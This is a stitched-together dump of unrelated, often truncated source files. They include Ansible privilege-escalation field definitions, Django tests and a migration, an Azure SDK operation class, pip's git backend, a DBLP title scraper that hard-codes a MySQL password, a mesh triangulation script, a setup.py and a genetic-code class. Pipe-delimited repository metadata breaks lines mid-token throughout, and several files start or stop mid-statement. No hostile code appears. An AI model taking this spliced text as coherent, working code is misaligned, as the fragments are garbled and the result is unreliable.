_accelerate_ipv6 = FieldAttribute(isa='bool', default=False, always_post_validate=True)
_accelerate_port = FieldAttribute(isa='int', default=C.ACCELERATE_PORT, always_post_validate=True)
_executable = FieldAttribute(isa='string', default=C.DEFAULT_EXECUTABLE)
_module_compression = FieldAttribute(isa='string', default=C.DEFAULT_MODULE_COMPRESSION)
# privilege escalation fields
_become = FieldAttribute(isa='bool')
_become_method = FieldAttribute(isa='string')
_become_user = FieldAttribute(isa='string')
_become_pass = FieldAttribute(isa='string')
_become_exe = FieldAttribute(isa='string')
_become_flags = FieldAttribute(isa='string')
_prompt = FieldAttribute(isa='string')
# backwards compatibility fields for sudo/su
_sudo_exe = FieldAttribute(isa='string')
_sudo_flags = FieldAttribute(isa='string')
_sudo_pass = FieldAttribute(isa='string')
_su_exe = FieldAttribute(isa='string')
_su_flags = FieldAttribute(isa='string')
_su_pass = FieldAttribute(isa='string')
# general flags
_verbosity = FieldAttribute(isa='int', default=0)
_only_tags = FieldAttribute(isa='set', default=set())
_skip_tags = FieldAttribute(isa='set', default=set())
_check_mode = FieldAttribute(isa='bool', default=False)
_force_handlers = FieldAttribute(isa='bool', default=False)
_start_at_task = FieldAttribute(isa='string')
_step = FieldAttribute(isa='bool', default=False)
_diff = FieldAttribute(isa='bool', default=C.DIFF_ALWAYS)
# Fact gathering settings
_gather_subset = FieldAttribute(isa='string', default=C.DEFAULT_GATHER_SUBSET)
_gather_timeout = FieldAttribute(isa='string', default=C.DEFAULT_GATHER_TIMEOUT)
_fact_path = Fie |
OlegKlimenko/Plamber | app/tests/test_models.py | Python | apache-2.0 | 53,921 | 0.004636 | # -*- coding: utf-8 -*-
import copy
import os
from django.contrib import auth
from django.contrib.auth.models import User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.models import QuerySet
from django.test import TestCase, Client, mock
from django.urls import reverse
from ..forms import AddBookForm
from ..models import (TheUser, Category, Author, Language, Book,
AddedBook, BookRating, BookComment, Post, SupportMessage, BookRelatedData)
from .utils import Utils
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
TEST_DATA_DIR = os.path.join(TEST_DIR, 'fixtures')
# ----------------------------------------------------------------------------------------------------------------------
class ModelTest(TestCase):
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setUpTestData(cls):
cls.setup_users()
cls.setup_categories()
cls.setup_authors()
cls.setup_languages()
cls.setup_books()
cls.setup_added_books()
cls.setup_book_rating()
cls.setup_book_comment()
cls.setup_post_messages()
cls.setup_support_messages()
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_users(cls):
client = Client()
cls.anonymous_user = auth.get_user(client)
cls.user1 = User.objects.create_user('user1', 'user1@user1.com', 'testpassword1')
cls.user2 = User.objects.create_user('user2', 'user2@user2.com', 'testpassword2')
cls.user3 = User.objects.create_user('user3', 'user3@user3.com', 'testpassword3')
cls.user4 = User.objects.create_user('user4', 'user4@user4.com', 'testpassword4')
cls.user5 = User.objects.create_user('user5', 'user5@user5.com', 'testpassword5')
cls.user6 = User.objects.create_user('user6', 'user6@user6.com', 'testpassword6')
cls.the_user1 = TheUser.objects.get(id_user=cls.user1)
cls.the_user2 = TheUser.objects.get(id_user=cls.user2)
cls.the_user5 = TheUser.objects.get(id_user=cls.user5)
cls.the_user6 = TheUser.objects.get(id_user=cls.user6)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_categories(cls):
cls.category1 = Category.objects.create(category_name='category1')
cls.category2 = Category.objects.create(category_name='category2')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_authors(cls):
cls.author1 = Author.objects.create(author_name='Best Author 1')
cls.author2 = Author.objects.create(author_name='trueAuthorNew')
cls.author3 = Author.objects.create(author_name='zlast author')
cls.author4 = Author.objects.create(author_name='<AuthorSpecialSymbols>&"')
cls.author5 = Author.objects.create(author_name="O'Connor")
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_languages(cls):
cls.language_en = Language.objects.create(language='English')
cls.language_ru = Language.objects.create(language='Russian')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_books(cls):
test_book_path = os.path.join(TEST_DATA_DIR, 'test_book.pdf')
test_book_image_path = os.path.join(TEST_DATA_DIR, 'test_book_image.png')
books_setup = [
{
'name': 'First Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
| 'name': 'Second Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
| 'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Third Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'blocked_book': True
},
{
'name': 'Fourth Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Fifth Book',
'author': cls.author1,
'category': cls.category2,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
'name': 'Sixth Book',
'author': cls.author2,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
},
{
'name': 'Seventh Book<>&"',
'author': cls.author4,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
}
]
for book in books_setup:
Book.objects.create(
book_name=book['name'],
id_author=book['author'],
id_category=book['category'],
description='TEST description',
language=book['language'],
book_file=book['file'],
photo=book.get('photo', False),
who_added=book['who_added'],
private_book=book.get('private', False),
blocked_book=book.get('blocked_book', False)
)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_added_books(cls):
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Fourth Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user2 |
xflows/clowdflows-backend | services/tests.py | Python | mit | 685 | 0.007299 | from pysimplesoap.client import SoapClient
def inspect(wsdl_url):
    """Print a human-readable summary of every operation in a WSDL.

    Connects to *wsdl_url* and walks services -> ports -> operations,
    printing each operation's name, documentation, SOAPAction and
    argument/return type declarations to stdout.
    """
    client = SoapClient(wsdl=wsdl_url, trace=False)
    print("Target Namespace", client.namespace)
    for service in client.services.values():
        for port in service['ports'].values():
            print(port['location'])
            for operation in port['operations'].values():
                # Emit the same labelled fields the original printed, in order.
                for label, value in (
                        ('Name:', operation['name']),
                        ('Docs:', operation['documentation'].strip()),
                        ('SOAPAction:', operation['action']),
                        ('Input', operation['input']),    # args type declaration
                        ('Output', operation['output'])): # returns type declaration
                    print(label, value)
                print('\n')
UNINETT/nav | python/nav/mibs/hp_httpmanageable_mib.py | Python | gpl-2.0 | 1,236 | 0 | #
# Copyright (C) 2015 Uninett AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 3 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details. You should have received a copy of the GNU General Public License
# along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
from twisted.internet import defer
from nav.smidumps import get_mib
from nav.mibs.mibretriever import MibRetriever
class HPHTTPManageableMib(MibRetriever):
    """HP-httpManageable-MIB (SEMI-MIB) MibRetriever.

    Retrieves data from HP devices that implement the proprietary SEMI-MIB.
    """
    # Parsed MIB dump used by MibRetriever to resolve names to OIDs.
    mib = get_mib('SEMI-MIB')
    @defer.inlineCallbacks
    def get_serial_number(self):
        """Tries to get a chassis serial number from old HP switches.

        Returns a Deferred; its result is the serial number as a text
        string, or no result at all when the device returned nothing.
        """
        serial = yield self.get_next('hpHttpMgSerialNumber')
        if serial:
            # SNMP octet strings may arrive as bytes; normalize to text.
            if isinstance(serial, bytes):
                serial = serial.decode("utf-8")
            defer.returnValue(serial)
|
GNUtn/eventoL | eventol/manager/migrations/0036_auto_20191015_2132.py | Python | gpl-3.0 | 624 | 0.001603 | # -*- coding: utf-8 -*-
# Genera | ted by Django 1.11.23 on 2019-10-15 21:32
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: alters Event.limit_proposal_date with a one-off
    # default (the generation date) applied to pre-existing rows only.
    dependencies = [
        ('manager', '0035_auto_20191013_1705'),
    ]
    operations = [
        migrations.AlterField(
            model_name='event',
            name='limit_proposal_date',
            # The concrete date was supplied interactively at generation
            # time; preserve_default=False drops it from the field schema
            # after backfilling existing rows.
            field=models.DateField(default=datetime.date(2019, 10, 15), help_text='Limit date to submit talk proposals', verbose_name='Limit Proposals Date'),
            preserve_default=False,
        ),
    ]
|
Azure/azure-sdk-for-python | sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/v2020_04_01_preview/operations/_private_link_resources_operations.py | Python | mit | 4,897 | 0.004288 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PrivateLinkResourcesOperations(object):
    """PrivateLinkResourcesOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.keyvault.v2020_04_01_preview.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        # Wired up by the generated KeyVault management client.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    def list_by_vault(
        self,
        resource_group_name, # type: str
        vault_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.PrivateLinkResourceListResult"
        """Gets the private link resources supported for the key vault.
        :param resource_group_name: Name of the resource group that contains the key vault.
        :type resource_group_name: str
        :param vault_name: The name of the key vault.
        :type vault_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: PrivateLinkResourceListResult, or the result of cls(response)
        :rtype: ~azure.mgmt.keyvault.v2020_04_01_preview.models.PrivateLinkResourceListResult
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.PrivateLinkResourceListResult"]
        # Map well-known HTTP statuses to typed azure-core exceptions;
        # callers may extend/override via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-04-01-preview"
        accept = "application/json"
        # Construct URL
        url = self.list_by_vault.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'vaultName': self._serialize.url("vault_name", vault_name, 'str', pattern=r'^[a-zA-Z0-9-]{3,24}$'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('PrivateLinkResourceListResult', pipeline_response)
        if cls:
            # Honor the custom response hook supplied via the 'cls' kwarg.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    # The ARM URL template consumed above; attached as function metadata.
    list_by_vault.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/vaults/{vaultName}/privateLinkResources'}  # type: ignore
|
mathjazz/pontoon | pontoon/checks/models.py | Python | bsd-3-clause | 1,177 | 0.00085 | from django.db import models
from pontoon.base.models import Translation
class FailedCheck(models.Model):
    """
    Store checks performed on translations if they failed.
    Severity of failed checks are expressed by subclasses of this model.
    """
    class Library(models.TextChoices):
        # Which QA library produced the failure; the short code is stored.
        PONTOON = "p", "pontoon"
        COMPARE_LOCALES = "cl", "compare-locales"
    # Short code of the producing library (see Library choices above).
    library = models.CharField(
        max_length=20,
        choices=Library.choices,
        db_index=True,
    )
    # Human-readable description of the failed check.
    message = models.TextField()
    class Meta:
        # No table of its own; concrete severity subclasses provide one.
        abstract = True
    def __repr__(self):
        # E.g. "[Warning] pontoon: <message>".
        return "[{}] {}: {}".format(
            self.__class__.__name__, self.get_library_display(), self.message
        )
class Warning(FailedCheck):
    # Warning-severity failed check attached to a translation.
    translation = models.ForeignKey(
        Translation, models.CASCADE, related_name="warnings"
    )
    class Meta(FailedCheck.Meta):
        # Record each (translation, library, message) failure only once.
        unique_together = (("translation", "library", "message"),)
class Error(FailedCheck):
    # Error-severity failed check attached to a translation.
    translation = models.ForeignKey(Translation, models.CASCADE, related_name="errors")
    class Meta(FailedCheck.Meta):
        # Record each (translation, library, message) failure only once.
        unique_together = (("translation", "library", "message"),)
|
pantsbuild/pex | pex/vendor/_vendored/pip/pip/_internal/vcs/git.py | Python | apache-2.0 | 15,599 | 0 | # The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os.path
import re
from pip._vendor.packaging.version import parse as parse_version
from pip._vendor.six.moves.urllib import parse as urllib_parse
from pip._vendor.six.moves.urllib import request as urllib_request
from pip._internal.exceptions import BadCommand, InstallationError
from pip._internal.utils.misc import display_path, hide_url
from pip._internal.utils.subprocess import make_command
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.vcs.versioncontrol import (
RemoteNotFoundError,
VersionControl,
find_path_to_setup_from_repo_root,
vcs,
)
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from pip._internal.utils.misc import HiddenText
from pip._internal.vcs.versioncontrol import AuthInfo, RevOptions
urlsplit = urllib_parse.urlsplit
urlunsplit = urllib_parse.urlunsplit
logger = logging.getLogger(__name__)
HASH_REGEX = re.compile('^[a-fA-F0-9]{40}$')
def looks_like_hash(sha):
    """Return True when *sha* has the form of a full 40-hex-digit SHA-1."""
    match = HASH_REGEX.match(sha)
    return match is not None
class Git(VersionControl):
name = 'git'
dirname = '.git'
repo_name = 'clone'
schemes = (
'git', 'git+http', 'git+https', 'git+ssh', 'git+git', 'git+file',
)
# Prevent the user's environment variables from interfering with pip:
# https://github.com/pypa/pip/issues/1130
unset_environ = ('GIT_DIR', 'GIT_WORK_TREE')
default_arg_rev = 'HEAD'
    @staticmethod
    def get_base_rev_args(rev):
        """Return the base command-line args that select revision *rev*."""
        # Git accepts the revision name verbatim; no extra flags needed.
        return [rev]
    def is_immutable_rev_checkout(self, url, dest):
        # type: (str, str) -> bool
        """Return True when `dest` is checked out at an immutable revision.

        True only when the URL pins a revision, the checkout currently
        points at exactly that commit, and the name is not also a
        branch/tag (which could move in the future).
        """
        _, rev_options = self.get_url_rev_options(hide_url(url))
        if not rev_options.rev:
            # No revision requested at all -> nothing is pinned.
            return False
        if not self.is_commit_id_equal(dest, rev_options.rev):
            # the current commit is different from rev,
            # which means rev was something else than a commit hash
            return False
        # return False in the rare case rev is both a commit hash
        # and a tag or a branch; we don't want to cache in that case
        # because that branch/tag could point to something else in the future
        is_tag_or_branch = bool(
            self.get_revision_sha(dest, rev_options.rev)[0]
        )
        return not is_tag_or_branch
    def get_git_version(self):
        """Return the installed git executable's version, parsed.

        Falls back to parsing the empty string when `git version` output
        does not start with the expected prefix.
        """
        VERSION_PFX = 'git version '
        version = self.run_command(
            ['version'], show_stdout=False, stdout_only=True
        )
        if version.startswith(VERSION_PFX):
            # First whitespace-separated token after the prefix, e.g. "2.30.1".
            version = version[len(VERSION_PFX):].split()[0]
        else:
            version = ''
        # get first 3 positions of the git version because
        # on windows it is x.y.z.windows.t, and this parses as
        # LegacyVersion which always smaller than a Version.
        version = '.'.join(version.split('.')[:3])
        return parse_version(version)
    @classmethod
    def get_current_branch(cls, location):
        """
        Return the current branch, or None if HEAD isn't at a branch
        (e.g. detached HEAD).
        """
        # git-symbolic-ref exits with empty stdout if "HEAD" is a detached
        # HEAD rather than a symbolic ref. In addition, the -q causes the
        # command to exit with status code 1 instead of 128 in this case
        # and to suppress the message to stderr.
        args = ['symbolic-ref', '-q', 'HEAD']
        output = cls.run_command(
            args,
            extra_ok_returncodes=(1, ),
            show_stdout=False,
            stdout_only=True,
            cwd=location,
        )
        ref = output.strip()
        # Only local branch refs count; strip the prefix to get the name.
        if ref.startswith('refs/heads/'):
            return ref[len('refs/heads/'):]
        return None
    def export(self, location, url):
        # type: (str, HiddenText) -> None
        """Export the Git repository at the url to the destination location"""
        # checkout-index treats --prefix as a literal string prefix, so it
        # must end in '/' to be interpreted as a directory.
        if not location.endswith('/'):
            location = location + '/'
        with TempDirectory(kind="export") as temp_dir:
            # Clone into a temp dir, then write the work tree (without .git)
            # into `location`.
            self.unpack(temp_dir.path, url=url)
            self.run_command(
                ['checkout-index', '-a', '-f', '--prefix', location],
                show_stdout=False, cwd=temp_dir.path
            )
    @classmethod
    def get_revision_sha(cls, dest, rev):
        """
        Return (sha_or_none, is_branch), where sha_or_none is a commit hash
        if the revision names a remote branch or tag, otherwise None.
        Args:
            dest: the repository directory.
            rev: the revision name.
        """
        # Pass rev to pre-filter the list.
        output = cls.run_command(
            ['show-ref', rev],
            cwd=dest,
            show_stdout=False,
            stdout_only=True,
            on_returncode='ignore',
        )
        refs = {}
        # show-ref prints one "<sha> <ref>" pair per line.
        for line in output.strip().splitlines():
            try:
                sha, ref = line.split()
            except ValueError:
                # Include the offending line to simplify troubleshooting if
                # this error ever occurs.
                raise ValueError('unexpected show-ref line: {!r}'.format(line))
            refs[ref] = sha
        branch_ref = 'refs/remotes/origin/{}'.format(rev)
        tag_ref = 'refs/tags/{}'.format(rev)
        # Prefer a remote branch match over a tag of the same name.
        sha = refs.get(branch_ref)
        if sha is not None:
            return (sha, True)
        sha = refs.get(tag_ref)
        return (sha, False)
@classmethod
def _should_fetch(cls, dest, rev):
"""
Return true if rev is a ref or is a commit that we don't have locally.
Branches and tags are not considered in this method because they are
assumed to be always available locally (which is a normal outcome of
``git clone` | ` and ``git fetch --tags``).
"""
if rev.startswith("refs/"):
# Always fetch remote refs.
return True
if not looks_like_hash(rev):
# Git fetch would fail wi | th abbreviated commits.
return False
if cls.has_commit(dest, rev):
# Don't fetch if we have the commit locally.
return False
return True
    @classmethod
    def resolve_revision(cls, dest, url, rev_options):
        # type: (str, HiddenText, RevOptions) -> RevOptions
        """
        Resolve a revision to a new RevOptions object with the SHA1 of the
        branch, tag, or ref if found.
        Args:
            rev_options: a RevOptions object.
        """
        rev = rev_options.arg_rev
        # The arg_rev property's implementation for Git ensures that the
        # rev return value is always non-None.
        assert rev is not None
        sha, is_branch = cls.get_revision_sha(dest, rev)
        if sha is not None:
            # Known remote branch or tag: pin to its SHA so later
            # operations act on an exact commit.
            rev_options = rev_options.make_new(sha)
            rev_options.branch_name = rev if is_branch else None
            return rev_options
        # Do not show a warning for the common case of something that has
        # the form of a Git commit hash.
        if not looks_like_hash(rev):
            logger.warning(
                "Did not find branch or tag '%s', assuming revision or ref.",
                rev,
            )
        if not cls._should_fetch(dest, rev):
            return rev_options
        # fetch the requested revision
        cls.run_command(
            make_command('fetch', '-q', url, rev_options.to_args()),
            cwd=dest,
        )
        # Change the revision to the SHA of the ref we fetched
        sha = cls.get_revision(dest, rev='FETCH_HEAD')
        rev_options = rev_options.make_new(sha)
        return rev_options
@classmethod
def is_commit_id_equal(cls, dest, name):
"""
Return whether the current commit hash equals the given name.
Args:
dest: the repository directory.
name: a string name.
"""
if not name:
# Then avoid an unnecessary subprocess call.
return False
return cls.get_revis |
dcclogin/TextGenerator | TitleCrawler/ccf_conference/categories/database/apweb2015.py | Python | mit | 3,395 | 0.028866 |
# -*- coding: utf-8 -*-
import re
import copy
import random
import os, sys
import MySQLdb
import requests
from time import sleep
from threading import Thread
from bs4 import BeautifulSoup
reload(sys)
sys.setdefaultencoding('utf-8')
clade = 'http://dblp.uni-trier.de/db/conf/apweb/'
months = {
'January': '01',
'February': '02',
'March': '03',
'April': '04',
'May': '05',
'June': '06',
'July': '07',
'August': '08',
'September': '09',
'October': '10',
'November': '11',
'December': '12'
}
# regex to match months in <h2> tags
re_mons=r'(January|February|March|April|May|June|July|August|September|October|November|December)'
repeato_mons=r'([ /-]*'+re_mons+r'*)*'
pattern_mons=re_mons+repeato_mons
# regex to match years in <h2> tags
re_year=r'((19|20)\d+)'
repeato_year=r'([ /-]*'+re_year+r'*)*'
pattern_year=re_year+repeato_year
def get_leaves(clade):
    """Collect links to individual conference-edition pages from a DBLP index.

    Each <div class="data" itemprop="headline"> entry's last anchor points
    at the edition's table-of-contents page.

    Returns a list of URLs; an empty list when the HTTP request fails.
    (Previously the failure path implicitly returned None, which made the
    caller's `for leaf in leaves` crash with a TypeError.)
    """
    leaves = []
    r = requests.get(clade)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, 'lxml')
        late = soup.find('ul', class_='publ-list')
        tags = late.find_all('div', class_='data', itemprop='headline')
        for tag in tags:
            leaves.append(tag.find_all('a')[-1]['href'])
    return leaves
def sub_months(match_obj):
    """ transfer months to digital form.

    Returns a new string with every English month name replaced by its
    two-digit number (strings are immutable, so the replacement cannot
    happen in place despite the original comment).
    """
    for m in months:
        match_obj = re.sub(m, months[m], match_obj)
    return match_obj
def get_yymm(leaf):
    """Extract (year, month) strings from a conference-edition headline.

    The month is converted to two-digit form via sub_months(); either
    element is None when its regex fails to match.
    NOTE(review): implicitly returns a bare None (not a 2-tuple) when the
    HTTP request fails -- callers unpacking the result would crash.
    """
    r = requests.get(leaf)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, 'lxml')
        lat = soup.find('div', class_='data', itemprop='headline')
        tag = lat.find('span', class_='title', itemprop='name')
        txt = tag.get_text()
        try:
            # e.g. "June 2015" -> "06"; failures are logged and yield None.
            match_obj_mons = re.search(pattern_mons, txt)
            match_obj_mons = match_obj_mons.group().strip()
            match_obj_mons = sub_months(match_obj_mons)
            month = match_obj_mons
        except Exception, error_mons:
            print '[-]', error_mons
            month = None
        try:
            match_obj_year = re.search(pattern_year, txt)
            match_obj_year = match_obj_year.group().strip()
            year = match_obj_year
        except Exception, error_year:
            print '[-]', error_year
            year = None
        return year, month
def get_titles(leaf):
    """Scrape all paper titles from one conference-edition page.

    NOTE(review): implicitly returns None (not []) when the HTTP request
    fails, so callers iterating over the result would crash in that case.
    """
    r = requests.get(leaf)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, 'lxml')
        title_lst = []
        # Each entry exposes its title in a span[itemprop=name] element.
        tags = soup.find_all('span', class_='title', itemprop='name')
        for tag in tags:
            title_lst.append(tag.get_text())
        return title_lst
def incert_mysql(year, month, title_lst):
    """Insert the scraped titles into the conference.papertitle table.

    Each row is tagged with conference name 'APWeb', class 'C' and
    category 'database'.  A failed single insert is logged and skipped;
    the whole batch is committed once at the end.
    """
    try:
        tablename = 'papertitle'
        # NOTE(review): database credentials are hard-coded here; they
        # should be moved to configuration/environment.
        conn = MySQLdb.connect(host='127.0.0.1', user='root', passwd='13917331612', db='conference')
        c = conn.cursor()
        # Force utf8 on the connection so non-ASCII titles survive.
        conn.set_character_set('utf8')
        c.execute('SET NAMES utf8;')
        c.execute('SET CHARACTER SET utf8;')
        c.execute('SET character_set_connection=utf8;')
        for p in title_lst:
            try:
                # Values are bound as parameters; only the (constant)
                # table name is string-concatenated into the SQL.
                sql = "insert into " + tablename + "(year, month, name, title, class, category) \
                values(%s, %s, %s, %s, %s, %s)"
                param = (year, month, 'APWeb', p, 'C', 'database')
                c.execute(sql, param)
                print ">>>> [+] Insert paper <%s> : done." %(p)
            except MySQLdb.Error, e:
                print "[-] Mysql Error %d: %s" % (e.args[0], e.args[1])
                continue
        conn.commit()
        c.close()
    except MySQLdb.Error, e:
        print "[-] Mysql Error %d: %s" % (e.args[0], e.args[1])
    return None
def build():
    """Crawl every APWeb edition listed on DBLP and store its titles."""
    leaves = get_leaves(clade)
    for leaf in leaves:
        title_lst = get_titles(leaf)
        year, month = get_yymm(leaf)
        incert_mysql(year, month, title_lst)
    return None
# Kicks off the crawl at import time -- this module is a script.
build()
lcharleux/argiope | argiope/tests/mesh/triangulation.py | Python | gpl-3.0 | 1,193 | 0.004191 | import argiope as ag
import numpy as np
import pandas as pd
from matplotlib.tri import Triangulation
# Load a Gmsh mesh and build a matplotlib Triangulation from it.
mesh = ag.mesh.read_msh("demo.msh")
# Split elements into simplices; unstacking yields one row per simplex
# with its corner-node labels -- assumes 3 corners (triangles); TODO confirm
# against argiope.mesh documentation.
conn = mesh.split("simplices").unstack()
coords = mesh.nodes.coords.copy()
# Node labels are arbitrary, so map each label to its 0-based position...
node_map = pd.Series(data = np.arange(len(coords)), index = coords.index)
# ...and translate the connectivity table into positional indices.
conn = node_map.loc[conn.values.flatten()].values.reshape(*conn.shape)
triangulation = Triangulation(coords.x.values, coords.y.values, conn)
"""
nodes, elements = mesh.nodes, mesh.elements
#NODES
nodes_map = np.arange(nodes.index.max()+1)
nodes_map[nodes.index] = np.arange(len(nodes.index))
nodes_map[0] = -1
coords = nodes.coords.as_matrix()
#ELEMENTS
connectivities = elements.conn.as_matrix()
connectivities[np.isnan(connectivities)] = 0
connectivities = connectiv | ities.astype(np.int32)
connectivities = nodes_map[connectivities]
labels = np.array(elements.index)
etype = np.array(elements.type.argiope).flatten()
print(etype)
#TRIANGLES
x, y, tri = [], [], []
for i in range(len(etype)):
triangles = connectivities[i][argiope.mesh.ELEMENTS[etype[i]]["simplices"]]
for t in triangles:
tri.append(t)
triangulation = mpl.tri.Triangulation(coor | ds[:,0], coords[:,1], tri)
"""
|
h3l/rfw_utils | setup.py | Python | mit | 1,054 | 0.015217 | from setuptools import setup, find_packages
import sys, os
"""
| 打包的用的setup必须引入
"""
VERSION = '0.0.1'

# Long description shown on the PyPI project page.
with open('README.md') as f:
    long_description = f.read()

setup(
    name='rfw_utils',  # distribution name
    version=VERSION,  # must be bumped for every upload to PyPI
    description="Speed up restframework develop",
    long_description=long_description,  # README.md, rendered on the PyPI page
    # Without this, PyPI assumes reStructuredText and the Markdown README
    # renders incorrectly (or upload validation fails).
    long_description_content_type='text/markdown',
    classifiers=[],  # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
    keywords='restframework utils',  # search keywords
    author='helvetica',  # author name
    author_email='xidianlz@gmail.com',  # contact email
    url='https://github.com/h3l/rfw_utils',  # project home (GitHub, but any host works)
    license='MIT',  # distribution license
    packages=['rfw_utils', "rfw_utils.management", "rfw_utils.management.commands"],  # packages to ship
    include_package_data=True,
    zip_safe=True,
    install_requires=[
        'django',
        'djangorestframework'
    ],  # runtime dependencies
)
|
pgfoster/p4-phylogenetics | p4/geneticcode.py | Python | gpl-2.0 | 18,804 | 0.004733 | import string
import sys
class GeneticCode:
"""A container for NCBI translation tables.
See the ncbi translation tables, which this week are at
http://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi?mode=c
(If they move, poke around the 'taxonomy browser' area.)
This week we have
- **1** standard
- **2** vertebrate mito
- **3** yeast mito
- **4** Mold, Protozoan
- **5** invertbrate mito
- **6** The Ciliate, Dasycladacean and Hexamita Nuclear Code
- **9** echinoderm and flatworm mito
- **10** Euplotid Nuclear Code
- **11** Bacterial and Plant Plastid Code
- **12** Alternative Yeast Nuclear Code
